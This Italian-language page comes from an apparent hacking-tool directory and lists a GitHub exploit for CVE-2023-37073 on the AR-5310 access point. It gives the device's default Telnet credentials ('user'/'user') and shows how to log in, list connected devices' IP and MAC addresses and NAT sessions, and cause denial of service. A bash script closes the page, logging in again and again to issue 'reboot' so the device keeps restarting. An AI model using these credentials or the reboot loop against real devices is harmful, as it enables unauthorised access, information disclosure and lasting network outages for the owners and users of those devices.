Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-37073 — Le credenziali predefinite di Telnet possono portare a divulgazione di informazioni e attacchi denial-of-service (DoS). | Kitploit
Strumenti/GitHubGitHub/hamza0x/cve-2023-37073
Sicurezza IoTAttacchi alle PasswordExploitRaccolta InformazioniSicurezza Hardware e IoT
GitHubhamza0x/cve-2023-37073

CVE-2023-37073

Le credenziali predefinite di Telnet possono portare a divulgazione di informazioni e attacchi denial-of-service (DoS).

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-37073

Le credenziali predefinite di Telnet possono causare divulgazione di informazioni e attacchi denial-of-service (DoS).

Passaggi per riprodurre

Questo riguarda l'AP AR-5310

root@kitploit:~
  Telnet 192.168.1.1
  username:user
  password:user
  Then Boom ... You logged in 

Divulgazione di informazioni tramite credenziali predefinite Telnet

root@kitploit:~
    When you log in using Telnet service, 
    type the command 'help' or '?' to view    
    available options:
    
    > reboot, ping, lanhosts, passwd
  
    > restoredefault, nslookup, traceroute
  
    > save, uptime, exitOnIdle, wan, version,
  
    > serialnumber, modelname, tr69cfg, nat

root@kitploit:~
  To obtain the IP and MAC address of each device 
  connected to the network, run the command  
  'lanhosts'.
  To display all NAT sessions through the Access  
  Point (AP), 
  use the command 'nat show session'

Attacco DoS

root@kitploit:~
  To execute a Denial of Service (DoS) attack, 
  run the command 'reboot' to restart the AP. 
  I want to automate a script that will 
  consistently restart the AP.

Automazione dell'attacco DoS tramite script shell

root@kitploit:~
#!/bin/bash

# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"

# Function to check host availability
check_host_availability() {
    ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
    return $?
}

# Loop to check host availability and execute Telnet command when available
while true; do
    if check_host_availability; then
        echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
        { sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
    else
        echo "Host $HOST is not reachable. Retrying in 10 seconds..."
        sleep 10
    fi
done
Scarica lo strumento